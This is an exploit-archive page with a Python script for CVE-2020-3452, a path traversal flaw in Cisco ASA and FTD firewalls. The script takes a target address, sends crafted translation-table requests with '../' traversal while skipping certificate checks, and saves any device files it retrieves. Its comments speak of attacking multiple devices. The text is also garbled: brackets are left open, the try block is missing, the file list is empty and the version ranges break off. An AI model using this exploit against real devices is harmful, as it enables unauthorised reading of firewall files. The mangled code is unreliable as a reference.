Cisco ASA / FTD Path Traversal

Cisco ASA version and FTD version path traversal exploit. Original discovery of this vulnerability is attributed to 3ndG4me in October of 2020.

MD5 | 7cf23b4f5854a2f296a17705db8fae41

# Exploit Title: Cisco ASA and FTD - Path Traversal (2)
# Date: 12 Dec 2020
# Exploit Author: [email protected]
# Vendor Homepage:
# Software Link: It’s against Hardware, specifically ASA’s and FTD’s
# Version: ASAs (from version 9.6 to and FTD’s (versions 6.2.3 to
# Tested on: exploit runs on Python3 on OSX and on Kali Linux against cisco ASA 9.14
# CVE : CVE-2020-3452
# Github :

import requests

# Written by freakyclown for @CygentaHQ
# Cisco ASA Path Traversal
# CVE-2020-3452
# Usage: {target}"
# Example:"
# Requires - Requests - pip3 install requests
# This tool takes advantage of the above cve and attempts to
# download files as listed below, it is suggested that you make
# a working folder for the outputfiles to avoid confusion if
# attacking mutliple ASA's

# set your target
target = input("Enter target IP/Url: ")

def grabstuff():
for file in files:
print("trying: ", file)

#set request parameters
params = (
('type', 'mst'),
('textdomain', '+CSCOE+/'+file),
('default-language', ''),
('lang', '../'),

# set the response to the result of the request, inputting in target and params and ignoring ssl cert problems
response = requests.get('https://'+target+'/+CSCOT+/translation-table', params=params, verify=False)
# write the file to the disk
f = open(file,"w")

# this is a list of files available to download, more will be added in time
# if anyone has a list of ASA files, I'd be happy to add here
files = {

# obvious thing is obvious, try the things and barf if fail
except Exception as err:
print("Something went wrong sorry")

Related Posts